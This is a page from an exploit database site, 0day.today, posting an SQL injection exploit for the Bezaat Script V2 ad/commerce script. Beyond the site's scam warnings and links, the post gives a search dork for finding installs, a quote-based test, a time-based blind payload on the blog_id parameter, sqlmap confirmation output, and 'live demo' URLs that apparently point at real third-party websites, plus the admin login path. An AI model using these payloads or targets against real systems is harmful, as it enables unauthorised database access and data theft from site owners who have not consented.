0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bezaat Script V2 SQL Injection Vulnerability
###################### # Exploit Title : Bezaat Script V2 SQL Injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : Powed by Greenit Egypt for Information Technology # Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1 # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 15/09/2016 # video Proof : https://youtu.be/psHqU3Ldo5Q ###################### # [★] DESCRIPTION : ###################### # [+] Bezaat Script It's An Commerce Script # [+] That Allow you To Add and Menage ads in your Website # [+] AND an SQL Injection has been Detected in his Script Version 2 # [+] The Other Version Maybe Also infected ###################### # [★] Poc : ###################### # When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors # http://127.0.0.1/blog/blog.php?blog_id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/blog/blog.php?blog_id=1' ###################### # [★] SQLmap PoC: ###################### # Parameter: blog_id (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: blog_id=1 AND SLEEP(5) #--- #[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable #[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' #[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found #[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' #[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive # # GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [★] Live Demo : ###################### # http://al3ta.com/blog/blog.php?blog_id=1 # http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4 ###################### # [★] Admin Dashboard : ###################### # http://127.0.0.1/admin/adminlogin.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### # 0day.today [2024-12-24] #